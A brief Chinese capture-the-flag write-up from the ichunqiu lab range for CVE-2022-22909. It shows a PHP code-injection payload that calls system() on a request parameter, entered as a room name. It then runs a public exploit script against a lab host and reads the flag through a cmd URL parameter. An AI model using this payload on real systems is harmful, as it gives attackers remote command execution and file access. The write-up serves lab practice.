春秋云境 CVE-2022-22909

bug道一2025-12-01 22:20

前期准备

添加房间

复制代码 
{${system($_REQUEST[cmd])}}

poc地址

https://github.com/0z09e/CVE-2022-22909

poc使用

复制代码 
python exploit.py -t https://eci-2zeiki3y7m5txztvjdbi.cloudeci1.ichunqiu.com:80/ --noauth

之后访问

https://eci-2ze9m5xzmoww728cmfhc.cloudeci1.ichunqiu.com:80/dati/selectappartamenti.php?cmd=cat%20../../../../../flag

相关推荐
сокол6 小时前
【网安-Web渗透测试-免杀系列】内存免杀(无文件落地)
windows·网络安全
学习溢出8 小时前
【网络安全】追踪PowerShell命令历史
安全·网络安全
Sombra_Olivia9 小时前
Vulhub 中的 cmsms CVE-2019-9053 & CVE-2021-26120
安全·web安全·网络安全·渗透测试·vulhub
大方子11 小时前
【PolarCTF】bllbl_ser1
网络安全·polarctf
Chengbei1111 小时前
小程序 AI 渗透新工具MCP!打通调试与安全检测、网络抓包、接口分析、越权检测一站式实现
人工智能·安全·web安全·搜索引擎·网络安全·小程序·系统安全
humors22112 小时前
Windows运维与安全场景合集(不定期更新)
大数据·运维·服务器·程序人生·网络安全
X7x512 小时前
安全编排自动化与响应(SOAR):重塑企业安全运营的新引擎
网络安全·网络攻击模型·安全威胁分析·安全架构·soar
humors22112 小时前
聊聊密码为啥会“白设”
大数据·运维·服务器·网络·网络安全
消失的旧时光-194313 小时前
Android企业级网络架构实战:一套完整的双Token认证解决方案 ——(401自动续期|请求重放|RefreshToken刷新|并发401治理)
网络安全·网络框架·双token·android 网络认证架构
热门推荐
01GitHub 镜像站点02DeepSeek V4 + Claude Code thinking mode 400 错误修复方案03【AI】2026 年具身智能模型和世界模型总结04Codex 接入 DeepSeek API 完整配置文档05【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法06裂开!ChatGPT 居然开始要手机号验证,附详细解决方法07CC-Switch & Claude 基于 Linux 服务器安装使用指南08几个好用的ip纯净度检测网站09CC-Switch 全平台下载、安装与使用全指南(Windows/macOS/Linux)10API Key 登录 Codex 也能用插件了,还支持会话删除和导出